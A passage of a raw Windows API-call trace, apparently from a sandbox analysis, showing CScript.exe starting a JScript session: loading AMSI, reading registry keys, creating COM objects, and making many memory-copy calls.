(dwErrCode=0xb) [0099.403] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0099.404] free (_Block=0x24adfc67d80) [0099.404] CloseCodeAuthzLevel () returned 0x1 [0099.404] FreeLibrary (hLibModule=0x7ff871b10000) returned 1 [0099.405] CoGetClassObject (in: rclsid=0x24adfc67b90*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ff8598fc300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fe918 | out: ppv=0xd6788fe918*=0x24ae1459d70) returned 0x0 [0099.431] malloc (_Size=0x100) returned 0x24ae1458e10 [0099.431] __dllonexit () returned 0x7ff859834770 [0099.431] __dllonexit () returned 0x7ff859834780 [0099.432] __dllonexit () returned 0x7ff8598347a0 [0099.432] __dllonexit () returned 0x7ff8598347c0 [0099.432] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xd6788fc2e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f [0099.433] _splitpath_s (in: _FullPath="C:\\Windows\\System32\\CScript.exe", _Drive=0x0, _DriveSize=0x0, _Dir=0x0, _DirSize=0x0, _Filename=0xd6788fc460, _FilenameSize=0x104, _Ext=0x0, _ExtSize=0x0 | out: _Drive=0x0, _Dir=0x0, _Filename="CScript", _Ext=0x0) returned 0x0 [0099.433] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0xd6788fc448 | out: phkResult=0xd6788fc448*=0x0) returned 0x2 [0099.441] GetVersion () returned 0x295a000a [0099.441] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ff871bc0000 [0099.442] GetProcAddress (hModule=0x7ff871bc0000, lpProcName="QueryProtectedPolicy") returned 0x7ff86e5902d0 [0099.442] VirtualProtect (in: lpAddress=0x7ff85988f668, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0xd6788fc590 | out: lpflOldProtect=0xd6788fc590*=0x2) returned 1 [0099.442] VirtualProtect (in: lpAddress=0x7ff85988f668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xd6788fc590 | out: lpflOldProtect=0xd6788fc590*=0x4) returned 1 [0099.443] malloc (_Size=0x58) returned 0x24ae1459d70 [0099.445] malloc (_Size=0x3d8) returned 0x24ae191bb20 [0099.445] GetUserDefaultLCID () returned 0x409 [0099.445] GetACP () returned 0x4e4 [0099.445] LoadLibraryExW (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x800) returned 0x7ff86ba30000 [0099.463] GetProcAddress (hModule=0x7ff86ba30000, lpProcName="AmsiInitialize") returned 0x7ff86ba32260 [0099.464] GetProcAddress (hModule=0x7ff86ba30000, lpProcName="AmsiScanString") returned 0x7ff86ba326b0 [0099.464] AmsiInitialize () returned 0x0 [0099.520] free (_Block=0x24ae1459d70) [0099.521] malloc (_Size=0x18) returned 0x24ae191bfa0 [0099.521] malloc (_Size=0x58) returned 0x24ae1459d70 [0099.522] malloc (_Size=0x40) returned 0x24adfc67f50 [0099.522] GetCurrentThreadId () returned 0xcf4 [0099.522] malloc (_Size=0x48) returned 0x24ae1459e90 [0099.522] GetCurrentThreadId () returned 0xcf4 [0099.523] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0xd6788fe858 | out: phkResult=0xd6788fe858*=0x29c) returned 0x0 [0099.523] RegQueryValueExA (in: hKey=0x29c, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0xd6788fe850, lpData=0xd6788fe848, lpcbData=0xd6788fe840*=0x4 | out: lpType=0xd6788fe850*=0x4, lpData=0xd6788fe848*=0x1, lpcbData=0xd6788fe840*=0x4) returned 0x0 [0099.523] RegCloseKey (hKey=0x29c) returned 0x0 [0099.523] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ff86e520000 [0099.524] GetProcAddress (hModule=0x7ff86e520000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ff86e57f670 [0099.524] GetProcAddress (hModule=0x7ff86e520000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ff86e5e1540 [0099.529] ResolveDelayLoadedAPI () returned 0x7ff86f34fb70 [0099.529] CoCreateInstance (in: rclsid=0x7ff859892de0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff859892dd0*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fe800 | out: ppv=0xd6788fe800*=0x7ff86f4e9610) returned 0x0 [0099.532] malloc (_Size=0xb0) returned 0x24ae13c8860 [0099.533] malloc (_Size=0x8) returned 0x24adfc67fa0 [0099.533] malloc (_Size=0x58) returned 0x24ae1459ee0 [0099.533] malloc (_Size=0x4e8) returned 0x24ae13c8920 [0099.535] malloc (_Size=0x98) returned 0x24ae13c8e10 [0099.535] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0xd6788fe7e0, nSize=0x27 | out: lpBuffer="") returned 0x0 [0099.535] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0099.536] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xd6788fe880, cchData=6 | out: lpLCData="1252") returned 5 [0099.536] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.537] CoCreateInstance (in: rclsid=0x7ff859890940*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff859890900*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x24ae191be98 | out: ppv=0x24ae191be98*=0x24adf9a8d00) returned 0x0 [0099.537] IUnknown:AddRef (This=0x24adf9a8d00) returned 0x2 [0099.537] GetCurrentProcessId () returned 0xcf0 [0099.537] GetCurrentThreadId () returned 0xcf4 [0099.537] GetTickCount () returned 0x210ce25 [0099.537] ISystemDebugEventFire:BeginSession (This=0x24adf9a8d00, guidSourceID=0x7ff859890930, strSessionName="JScript:00003312:00003316:34655781") returned 0x0 [0099.538] GetCurrentThreadId () returned 0xcf4 [0099.538] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae13c8eb0 [0099.538] memcpy (in: _Dst=0x24ae13c8eb0, _Src=0x7ff8598af120, _Size=0xe | out: _Dst=0x24ae13c8eb0) returned 0x24ae13c8eb0 [0099.538] memcpy (in: _Dst=0x24ae13c8ebe, _Src=0x7ff859893390, _Size=0x6 | out: _Dst=0x24ae13c8ebe) returned 0x24ae13c8ebe [0099.538] memcpy (in: _Dst=0x24ae13c8ec4, _Src=0x7ff859893398, _Size=0x18 | out: _Dst=0x24ae13c8ec4) returned 0x24ae13c8ec4 [0099.539] malloc (_Size=0x30) returned 0x24ae13c9150 [0099.539] malloc (_Size=0x1008) returned 0x24ae13c9790 [0099.539] malloc (_Size=0x1a0) returned 0x24ae13ca7a0 [0099.541] malloc (_Size=0x911) returned 0x24ae13ca950 [0099.541] memcpy (in: _Dst=0x24ae13c9fc4, _Src=0x24ae18cdc3c, _Size=0x10 | out: _Dst=0x24ae13c9fc4) returned 0x24ae13c9fc4 [0099.541] malloc (_Size=0x108) returned 0x24ae14597a0 [0099.541] memcpy (in: _Dst=0x24ae13ca00c, _Src=0x7ff8598afc98, _Size=0x12 | out: _Dst=0x24ae13ca00c) returned 0x24ae13ca00c [0099.541] memcpy (in: _Dst=0x24ae13ca054, _Src=0x24ae18cdc4e, _Size=0x24 | out: _Dst=0x24ae13ca054) returned 0x24ae13ca054 [0099.541] malloc (_Size=0x208) returned 0x24ae13cb270 [0099.541] memcpy (in: _Dst=0x24ae13ca0ac, _Src=0x24ae18cdc74, _Size=0x14 | out: _Dst=0x24ae13ca0ac) returned 0x24ae13ca0ac [0099.542] memcpy (in: _Dst=0x24ae13ca0f4, _Src=0x24ae18cdc8c, _Size=0x22 | out: _Dst=0x24ae13ca0f4) returned 0x24ae13ca0f4 [0099.542] memcpy (in: _Dst=0x24ae13ca14c, _Src=0x24ae18cdcb2, _Size=0x1c | out: _Dst=0x24ae13ca14c) returned 0x24ae13ca14c [0099.542] memcpy (in: _Dst=0x24ae13ca19c, _Src=0x24ae18cdd90, _Size=0x6 | out: _Dst=0x24ae13ca19c) returned 0x24ae13ca19c [0099.542] memcpy (in: _Dst=0x24ae13ca1d4, _Src=0x24ae18cdd98, _Size=0x2a | out: _Dst=0x24ae13ca1d4) returned 0x24ae13ca1d4 [0099.542] memcpy (in: _Dst=0x24ae13ca234, _Src=0x24ae13ca820, _Size=0x24 | out: _Dst=0x24ae13ca234) returned 0x24ae13ca234 [0099.542] memcpy (in: _Dst=0x24ae13ca28c, _Src=0x24ae18cddfc, _Size=0xc | out: _Dst=0x24ae13ca28c) returned 0x24ae13ca28c [0099.542] memcpy (in: _Dst=0x24ae13ca2cc, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13ca2cc) returned 0x24ae13ca2cc [0099.542] malloc (_Size=0x408) returned 0x24ae13cb480 [0099.542] memcpy (in: _Dst=0x24ae13ca314, _Src=0x24ae18cde3a, _Size=0x32 | out: _Dst=0x24ae13ca314) returned 0x24ae13ca314 [0099.542] memcpy (in: _Dst=0x24ae13ca37c, _Src=0x24ae18cde6e, _Size=0x26 | out: _Dst=0x24ae13ca37c) returned 0x24ae13ca37c [0099.542] memcpy (in: _Dst=0x24ae13ca3d4, _Src=0x24ae18cde98, _Size=0x26 | out: _Dst=0x24ae13ca3d4) returned 0x24ae13ca3d4 [0099.542] memcpy (in: _Dst=0x24ae13ca42c, _Src=0x24ae18cdec2, _Size=0x1e | out: _Dst=0x24ae13ca42c) returned 0x24ae13ca42c [0099.542] memcpy (in: _Dst=0x24ae13ca47c, _Src=0x24ae18cdee4, _Size=0x14 | out: _Dst=0x24ae13ca47c) returned 0x24ae13ca47c [0099.543] memcpy (in: _Dst=0x24ae13ca4c4, _Src=0x24ae18cdefc, _Size=0x18 | out: _Dst=0x24ae13ca4c4) returned 0x24ae13ca4c4 [0099.543] memcpy (in: _Dst=0x24ae13ca514, _Src=0x24ae18cdf18, _Size=0x14 | out: _Dst=0x24ae13ca514) returned 0x24ae13ca514 [0099.543] memcpy (in: _Dst=0x24ae13ca55c, _Src=0x24ae18cdf8a, _Size=0x2c | out: _Dst=0x24ae13ca55c) returned 0x24ae13ca55c [0099.543] memcpy (in: _Dst=0x24ae13ca5bc, _Src=0x24ae13ca820, _Size=0x16 | out: _Dst=0x24ae13ca5bc) returned 0x24ae13ca5bc [0099.543] memcpy (in: _Dst=0x24ae13ca604, _Src=0x24ae13ca820, _Size=0xe | out: _Dst=0x24ae13ca604) returned 0x24ae13ca604 [0099.543] memcpy (in: _Dst=0x24ae13ca644, _Src=0x24ae18ce01c, _Size=0x20 | out: _Dst=0x24ae13ca644) returned 0x24ae13ca644 [0099.543] memcpy (in: _Dst=0x24ae13ca69c, _Src=0x24ae18ce03e, _Size=0x3e | out: _Dst=0x24ae13ca69c) returned 0x24ae13ca69c [0099.543] memcpy (in: _Dst=0x24ae13ca70c, _Src=0x24ae18ce080, _Size=0xc | out: _Dst=0x24ae13ca70c) returned 0x24ae13ca70c [0099.543] malloc (_Size=0x808) returned 0x24ae13cb890 [0099.543] memcpy (in: _Dst=0x24ae13ca74c, _Src=0x24ae18ce090, _Size=0x10 | out: _Dst=0x24ae13ca74c) returned 0x24ae13ca74c [0099.543] malloc (_Size=0x2008) returned 0x24ae13cc0a0 [0099.543] memcpy (in: _Dst=0x24ae13cc0d4, _Src=0x24ae18ce0a4, _Size=0x18 | out: _Dst=0x24ae13cc0d4) returned 0x24ae13cc0d4 [0099.544] memcpy (in: _Dst=0x24ae13cc124, _Src=0x24ae18ce0c0, _Size=0x1c | out: _Dst=0x24ae13cc124) returned 0x24ae13cc124 [0099.544] memcpy (in: _Dst=0x24ae13cc174, _Src=0x24ae18ce0e0, _Size=0x2c | out: _Dst=0x24ae13cc174) returned 0x24ae13cc174 [0099.544] memcpy (in: _Dst=0x24ae13cc1d4, _Src=0x24ae18ce110, _Size=0x24 | out: _Dst=0x24ae13cc1d4) returned 0x24ae13cc1d4 [0099.544] memcpy (in: _Dst=0x24ae13cc22c, _Src=0x24ae18ce1bc, _Size=0x24 | out: _Dst=0x24ae13cc22c) returned 0x24ae13cc22c [0099.544] memcpy (in: _Dst=0x24ae13cc284, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13cc284) returned 0x24ae13cc284 [0099.544] memcpy (in: _Dst=0x24ae13cc2cc, _Src=0x24ae18ce2be, _Size=0x32 | out: _Dst=0x24ae13cc2cc) returned 0x24ae13cc2cc [0099.544] memcpy (in: _Dst=0x24ae13cc334, _Src=0x24ae13ca820, _Size=0x10 | out: _Dst=0x24ae13cc334) returned 0x24ae13cc334 [0099.545] memcpy (in: _Dst=0x24ae13cc37c, _Src=0x24ae18ce326, _Size=0x30 | out: _Dst=0x24ae13cc37c) returned 0x24ae13cc37c [0099.545] memcpy (in: _Dst=0x24ae13cc3e4, _Src=0x24ae13ca820, _Size=0x20 | out: _Dst=0x24ae13cc3e4) returned 0x24ae13cc3e4 [0099.546] memcpy (in: _Dst=0x24ae13cc43c, _Src=0x24ae13ca820, _Size=0x1c | out: _Dst=0x24ae13cc43c) returned 0x24ae13cc43c [0099.546] memcpy (in: _Dst=0x24ae13cc48c, _Src=0x24ae18ce3cc, _Size=0x38 | out: _Dst=0x24ae13cc48c) returned 0x24ae13cc48c [0099.546] memcpy (in: _Dst=0x24ae13cc4fc, _Src=0x24ae13ca820, _Size=0x2c | out: _Dst=0x24ae13cc4fc) returned 0x24ae13cc4fc [0099.546] memcpy (in: _Dst=0x24ae13cc55c, _Src=0x24ae13ca820, _Size=0x26 | out: _Dst=0x24ae13cc55c) returned 0x24ae13cc55c [0099.546] memcpy (in: _Dst=0x24ae13cc5b4, _Src=0x24ae13ca820, _Size=0x20 | out: _Dst=0x24ae13cc5b4) returned 0x24ae13cc5b4 [0099.546] memcpy (in: _Dst=0x24ae13cc60c, _Src=0x24ae13ca820, _Size=0x1a | out: _Dst=0x24ae13cc60c) returned 0x24ae13cc60c [0099.546] memcpy (in: _Dst=0x24ae13cc65c, _Src=0x24ae18ce4d4, _Size=0x22 | out: _Dst=0x24ae13cc65c) returned 0x24ae13cc65c [0099.546] memcpy (in: _Dst=0x24ae13cc6b4, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13cc6b4) returned 0x24ae13cc6b4 [0099.546] memcpy (in: _Dst=0x24ae13cc6fc, _Src=0x24ae18ce524, _Size=0x22 | out: _Dst=0x24ae13cc6fc) returned 0x24ae13cc6fc [0099.546] memcpy (in: _Dst=0x24ae13cc754, _Src=0x24ae13ca820, _Size=0xc | out: _Dst=0x24ae13cc754) returned 0x24ae13cc754 [0099.546] memcpy (in: _Dst=0x24ae13cc794, _Src=0x24ae18ce5ac, _Size=0x1e | out: _Dst=0x24ae13cc794) returned 0x24ae13cc794 [0099.546] memcpy (in: _Dst=0x24ae13cc7e4, _Src=0x24ae13ca820, _Size=0x22 | out: _Dst=0x24ae13cc7e4) returned 0x24ae13cc7e4 [0099.547] malloc (_Size=0x1008) returned 0x24ae13ce0b0 [0099.547] memcpy (in: _Dst=0x24ae13cc83c, _Src=0x24ae18ce608, _Size=0x28 | out: _Dst=0x24ae13cc83c) returned 0x24ae13cc83c [0099.547] memcpy (in: _Dst=0x24ae13cc89c, _Src=0x24ae13ca820, _Size=0x2c | out: _Dst=0x24ae13cc89c) returned 0x24ae13cc89c [0099.547] memcpy (in: _Dst=0x24ae13cc8fc, _Src=0x24ae18ce712, _Size=0x28 | out: _Dst=0x24ae13cc8fc) returned 0x24ae13cc8fc [0099.547] memcpy (in: _Dst=0x24ae13cc95c, _Src=0x24ae13ca820, _Size=0x18 | out: _Dst=0x24ae13cc95c) returned 0x24ae13cc95c [0099.547] memcpy (in: _Dst=0x24ae13cc9ac, _Src=0x24ae18ce76e, _Size=0x30 | out: _Dst=0x24ae13cc9ac) returned 0x24ae13cc9ac [0099.547] memcpy (in: _Dst=0x24ae13cca14, _Src=0x24ae13ca820, _Size=0x14 | out: _Dst=0x24ae13cca14) returned 0x24ae13cca14 [0099.547] memcpy (in: _Dst=0x24ae13cca5c, _Src=0x24ae18ce7ce, _Size=0x26 | out: _Dst=0x24ae13cca5c) returned 0x24ae13cca5c [0099.547] memcpy (in: _Dst=0x24ae13ccab4, _Src=0x24ae13ca820, _Size=0x18 | out: _Dst=0x24ae13ccab4) returned 0x24ae13ccab4 [0099.547] memcpy (in: _Dst=0x24ae13ccb04, _Src=0x24ae18ce892, _Size=0x24 | out: _Dst=0x24ae13ccb04) returned 0x24ae13ccb04 [0099.547] memcpy (in: _Dst=0x24ae13ccb5c, _Src=0x24ae13ca820, _Size=0x16 | out: _Dst=0x24ae13ccb5c) returned 0x24ae13ccb5c [0099.547] memcpy (in: _Dst=0x24ae13ccba4, _Src=0x24ae18ce954, _Size=0x1e | out: _Dst=0x24ae13ccba4) returned 0x24ae13ccba4 [0099.547] memcpy (in: _Dst=0x24ae13ccbf4, _Src=0x24ae18ce974, _Size=0x2e | out: _Dst=0x24ae13ccbf4) returned 0x24ae13ccbf4 [0099.547] memcpy (in: _Dst=0x24ae13ccc54, _Src=0x24ae18ce9a6, _Size=0x1c | out: _Dst=0x24ae13ccc54) returned 0x24ae13ccc54 [0099.547] memcpy (in: _Dst=0x24ae13ccca4, _Src=0x24ae18ce9c6, _Size=0xe | out: _Dst=0x24ae13ccca4) returned 0x24ae13ccca4 [0099.548] memcpy (in: _Dst=0x24ae13ccce4, _Src=0x24ae18ce9d8, _Size=0x1a | out: _Dst=0x24ae13ccce4) returned 0x24ae13ccce4 [0099.548] memcpy (in: _Dst=0x24ae13ccd34, _Src=0x24ae18ce9f6, _Size=0x24 | out: _Dst=0x24ae13ccd34) returned 0x24ae13ccd34 [0099.548] memcpy (in: _Dst=0x24ae13ccd8c, _Src=0x24ae18cea30, _Size=0x2c | out: _Dst=0x24ae13ccd8c) returned 0x24ae13ccd8c [0099.548] memcpy (in: _Dst=0x24ae13ccdec, _Src=0x24ae13ca820, _Size=0x28 | out: _Dst=0x24ae13ccdec) returned 0x24ae13ccdec [0099.548] memcpy (in: _Dst=0x24ae13cce4c, _Src=0x24ae18ceaa0, _Size=0x22 | out: _Dst=0x24ae13cce4c) returned 0x24ae13cce4c [0099.548] memcpy (in: _Dst=0x24ae13ccea4, _Src=0x24ae18ceb8e, _Size=0x2a | out: _Dst=0x24ae13ccea4) returned 0x24ae13ccea4 [0099.548] memcpy (in: _Dst=0x24ae13ccf04, _Src=0x24ae13ca820, _Size=0x1e | out: _Dst=0x24ae13ccf04) returned 0x24ae13ccf04 [0099.548] memcpy (in: _Dst=0x24ae13ccf54, _Src=0x24ae18cec08, _Size=0x3e | out: _Dst=0x24ae13ccf54) returned 0x24ae13ccf54 [0099.548] memcpy (in: _Dst=0x24ae13ccfc4, _Src=0x24ae18cecaa, _Size=0x24 | out: _Dst=0x24ae13ccfc4) returned 0x24ae13ccfc4 [0099.548] memcpy (in: _Dst=0x24ae13cd01c, _Src=0x24ae18ced2e, _Size=0x34 | out: _Dst=0x24ae13cd01c) returned 0x24ae13cd01c [0099.548] memcpy (in: _Dst=0x24ae13cd084, _Src=0x24ae18cede4, _Size=0x24 | out: _Dst=0x24ae13cd084) returned 0x24ae13cd084 [0099.548] memcpy (in: _Dst=0x24ae13cd0dc, _Src=0x24ae13ca820, _Size=0x10 | out: _Dst=0x24ae13cd0dc) returned 0x24ae13cd0dc [0099.549] memcpy (in: _Dst=0x24ae13cd124, _Src=0x24ae18ceece, _Size=0x34 | out: _Dst=0x24ae13cd124) returned 0x24ae13cd124 [0099.549] memcpy (in: _Dst=0x24ae13cd18c, _Src=0x24ae13ca820, _Size=0x14 | out: _Dst=0x24ae13cd18c) returned 0x24ae13cd18c [0099.549] memcpy (in: _Dst=0x24ae13cd1d4, _Src=0x24ae13ca820, _Size=0x1c | out: _Dst=0x24ae13cd1d4) returned 0x24ae13cd1d4 [0099.549] memcpy (in: _Dst=0x24ae13cd224, _Src=0x24ae13ca820, _Size=0xe | out: _Dst=0x24ae13cd224) returned 0x24ae13cd224 [0099.549] memcpy (in: _Dst=0x24ae13cd264, _Src=0x24ae13ca820, _Size=0x20 | out: _Dst=0x24ae13cd264) returned 0x24ae13cd264 [0099.549] memcpy (in: _Dst=0x24ae13cd2bc, _Src=0x24ae18cefa4, _Size=0x3e | out: _Dst=0x24ae13cd2bc) returned 0x24ae13cd2bc [0099.549] memcpy (in: _Dst=0x24ae13cd32c, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13cd32c) returned 0x24ae13cd32c [0099.549] memcpy (in: _Dst=0x24ae13cd374, _Src=0x24ae13ca820, _Size=0x14 | out: _Dst=0x24ae13cd374) returned 0x24ae13cd374 [0099.549] memcpy (in: _Dst=0x24ae13cd3bc, _Src=0x24ae13ca820, _Size=0x28 | out: _Dst=0x24ae13cd3bc) returned 0x24ae13cd3bc [0099.549] memcpy (in: _Dst=0x24ae13cd41c, _Src=0x24ae13ca820, _Size=0x1a | out: _Dst=0x24ae13cd41c) returned 0x24ae13cd41c [0099.549] memcpy (in: _Dst=0x24ae13cd46c, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13cd46c) returned 0x24ae13cd46c [0099.549] memcpy (in: _Dst=0x24ae13cd4b4, _Src=0x24ae18cf0a2, _Size=0x38 | out: _Dst=0x24ae13cd4b4) returned 0x24ae13cd4b4 [0099.549] memcpy (in: _Dst=0x24ae13cd524, _Src=0x24ae18cf130, _Size=0x30 | out: _Dst=0x24ae13cd524) returned 0x24ae13cd524 [0099.550] memcpy (in: _Dst=0x24ae13cd58c, _Src=0x24ae13ca820, _Size=0xe | out: _Dst=0x24ae13cd58c) returned 0x24ae13cd58c [0099.550] memcpy (in: _Dst=0x24ae13cd5cc, _Src=0x24ae13ca820, _Size=0x24 | out: _Dst=0x24ae13cd5cc) returned 0x24ae13cd5cc [0099.550] memcpy (in: _Dst=0x24ae13cd624, _Src=0x24ae13ca820, _Size=0xe | out: _Dst=0x24ae13cd624) returned 0x24ae13cd624 [0099.550] malloc (_Size=0x2008) returned 0x24ae13cf0c0 [0099.550] memcpy (in: _Dst=0x24ae13cd664, _Src=0x24ae18cf200, _Size=0x4c | out: _Dst=0x24ae13cd664) returned 0x24ae13cd664 [0099.550] memcpy (in: _Dst=0x24ae13cd6e4, _Src=0x24ae18cf24e, _Size=0x24 | out: _Dst=0x24ae13cd6e4) returned 0x24ae13cd6e4 [0099.550] memcpy (in: _Dst=0x24ae13cd73c, _Src=0x24ae18cf276, _Size=0xe | out: _Dst=0x24ae13cd73c) returned 0x24ae13cd73c [0099.551] memcpy (in: _Dst=0x24ae13cd77c, _Src=0x24ae18cf33e, _Size=0x28 | out: _Dst=0x24ae13cd77c) returned 0x24ae13cd77c [0099.551] memcpy (in: _Dst=0x24ae13cd7dc, _Src=0x24ae18cf38a, _Size=0x2c | out: _Dst=0x24ae13cd7dc) returned 0x24ae13cd7dc [0099.551] memcpy (in: _Dst=0x24ae13cd83c, _Src=0x24ae13ca820, _Size=0x1a | out: _Dst=0x24ae13cd83c) returned 0x24ae13cd83c [0099.551] memcpy (in: _Dst=0x24ae13cd88c, _Src=0x24ae18cf47e, _Size=0x34 | out: _Dst=0x24ae13cd88c) returned 0x24ae13cd88c [0099.551] memcpy (in: _Dst=0x24ae13cd8f4, _Src=0x24ae13ca820, _Size=0x34 | out: _Dst=0x24ae13cd8f4) returned 0x24ae13cd8f4 [0099.551] memcpy (in: _Dst=0x24ae13cd95c, _Src=0x24ae13ca820, _Size=0x16 | out: _Dst=0x24ae13cd95c) returned 0x24ae13cd95c [0099.551] memcpy (in: _Dst=0x24ae13cd9a4, _Src=0x24ae18cf53c, _Size=0x36 | out: _Dst=0x24ae13cd9a4) returned 0x24ae13cd9a4 [0099.551] memcpy (in: _Dst=0x24ae13cda0c, _Src=0x24ae18cf592, _Size=0x26 | out: _Dst=0x24ae13cda0c) returned 0x24ae13cda0c [0099.551] memcpy (in: _Dst=0x24ae13cda64, _Src=0x24ae18cf63e, _Size=0x30 | out: _Dst=0x24ae13cda64) returned 0x24ae13cda64 [0099.551] memcpy (in: _Dst=0x24ae13cdacc, _Src=0x24ae13ca820, _Size=0x36 | out: _Dst=0x24ae13cdacc) returned 0x24ae13cdacc [0099.551] memcpy (in: _Dst=0x24ae13cdb34, _Src=0x24ae18cf6ec, _Size=0x30 | out: _Dst=0x24ae13cdb34) returned 0x24ae13cdb34 [0099.551] memcpy (in: _Dst=0x24ae13cdb9c, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13cdb9c) returned 0x24ae13cdb9c [0099.551] memcpy (in: _Dst=0x24ae13cdbe4, _Src=0x24ae18cf80e, _Size=0x3a | out: _Dst=0x24ae13cdbe4) returned 0x24ae13cdbe4 [0099.551] memcpy (in: _Dst=0x24ae13cdc54, _Src=0x24ae13ca820, _Size=0x10 | out: _Dst=0x24ae13cdc54) returned 0x24ae13cdc54 [0099.551] memcpy (in: _Dst=0x24ae13cdc9c, _Src=0x24ae18cf874, _Size=0x20 | out: _Dst=0x24ae13cdc9c) returned 0x24ae13cdc9c [0099.552] memcpy (in: _Dst=0x24ae13cdcf4, _Src=0x24ae13ca820, _Size=0x14 | out: _Dst=0x24ae13cdcf4) returned 0x24ae13cdcf4 [0099.552] memcpy (in: _Dst=0x24ae13cdd3c, _Src=0x24ae13ca820, _Size=0x12 | out: _Dst=0x24ae13cdd3c) returned 0x24ae13cdd3c [0099.552] memcpy (in: _Dst=0x24ae13cdd84, _Src=0x24ae18cf8f4, _Size=0x32 | out: _Dst=0x24ae13cdd84) returned 0x24ae13cdd84 [0099.552] memcpy (in: _Dst=0x24ae13cddec, _Src=0x24ae13ca820, _Size=0x2a | out: _Dst=0x24ae13cddec) returned 0x24ae13cddec [0099.552] memcpy (in: _Dst=0x24ae13cde4c, _Src=0x24ae13ca820, _Size=0x22 | out: _Dst=0x24ae13cde4c) returned 0x24ae13cde4c [0099.552] memcpy (in: _Dst=0x24ae13cdea4, _Src=0x24ae18cf9b2, _Size=0x44 | out: _Dst=0x24ae13cdea4) returned 0x24ae13cdea4 [0099.552] memcpy (in: _Dst=0x24ae13cdf1c, _Src=0x24ae18cfa16, _Size=0x3c | out: _Dst=0x24ae13cdf1c) returned 0x24ae13cdf1c [0099.552] memcpy (in: _Dst=0x24ae13cdf8c, _Src=0x24ae13ca820, _Size=0x14 | out: _Dst=0x24ae13cdf8c) returned 0x24ae13cdf8c [0099.552] memcpy (in: _Dst=0x24ae13cdfd4, _Src=0x24ae13ca820, _Size=0x2c | out: _Dst=0x24ae13cdfd4) returned 0x24ae13cdfd4 [0099.552] memcpy (in: _Dst=0x24ae13ce034, _Src=0x24ae18cfaca, _Size=0x44 | out: _Dst=0x24ae13ce034) returned 0x24ae13ce034 [0099.552] malloc (_Size=0x4008) returned 0x24adfc67fd0 [0099.553] memcpy (in: _Dst=0x24adfc68004, _Src=0x24ae13ca820, _Size=0x2e | out: _Dst=0x24adfc68004) returned 0x24adfc68004 [0099.553] memcpy (in: _Dst=0x24adfc68064, _Src=0x24ae18cfb54, _Size=0x22 | out: _Dst=0x24adfc68064) returned 0x24adfc68064 [0099.553] memcpy (in: _Dst=0x24adfc680bc, _Src=0x24ae13ca820, _Size=0x22 | out: _Dst=0x24adfc680bc) returned 0x24adfc680bc [0099.553] memcpy (in: _Dst=0x24adfc68114, _Src=0x24ae18cfbb0, _Size=0x28 | out: _Dst=0x24adfc68114) returned 0x24adfc68114 [0099.553] memcpy (in: _Dst=0x24adfc68174, _Src=0x24ae13ca820, _Size=0x16 | out: _Dst=0x24adfc68174) returned 0x24adfc68174 [0099.553] memcpy (in: _Dst=0x24adfc681bc, _Src=0x24ae18cfc06, _Size=0x2a | out: _Dst=0x24adfc681bc) returned 0x24adfc681bc [0099.553] memcpy (in: _Dst=0x24adfc6821c, _Src=0x24ae13ca820, _Size=0x28 | out: _Dst=0x24adfc6821c) returned 0x24adfc6821c [0099.553] memcpy (in: _Dst=0x24adfc6827c, _Src=0x24ae18cfc70, _Size=0x38 | out: _Dst=0x24adfc6827c) returned 0x24adfc6827c [0099.554] memcpy (in: _Dst=0x24adfc682ec, _Src=0x24ae13ca820, _Size=0xc | out: _Dst=0x24adfc682ec) returned 0x24adfc682ec [0099.554] memcpy (in: _Dst=0x24adfc6832c, _Src=0x24ae18cfccc, _Size=0x3e | out: _Dst=0x24adfc6832c) returned 0x24adfc6832c [0099.554] 